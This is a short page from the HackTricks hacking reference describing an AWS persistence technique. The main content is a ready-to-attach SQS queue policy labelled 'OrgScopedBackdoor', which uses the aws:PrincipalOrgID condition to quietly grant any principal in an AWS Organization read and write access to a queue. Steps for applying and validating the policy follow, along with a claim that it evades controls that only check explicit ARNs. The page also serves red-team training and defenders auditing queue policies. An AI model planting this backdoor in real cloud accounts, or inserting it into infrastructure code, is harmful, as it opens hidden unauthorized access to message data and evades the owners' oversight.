AWS - SQS OrgID Policy Backdoor

Reading time: 2 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Abuse an SQS queue resource policy to silently grant Send, Receive and ChangeMessageVisibility to any principal that belongs to a target AWS Organization using the condition aws:PrincipalOrgID. This creates an org-scoped hidden path that often evades controls that only look for explicit account or role ARNs or star principals.

Backdoor policy (attach to the SQS queue policy)

json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "OrgScopedBackdoor",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sqs:ReceiveMessage",
        "sqs:SendMessage",
        "sqs:ChangeMessageVisibility",
        "sqs:GetQueueAttributes"
      ],
      "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
      "Condition": {
        "StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
      }
    }
  ]
}

Steps

  • Obtain the Organization ID with AWS Organizations API.
  • Get the SQS queue ARN and set the queue policy including the statement above.
  • From any principal that belongs to that Organization, send and receive a message in the queue to validate access.

Impact

  • Organization-wide hidden access to read and write SQS messages from any account in the specified AWS Organization.

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks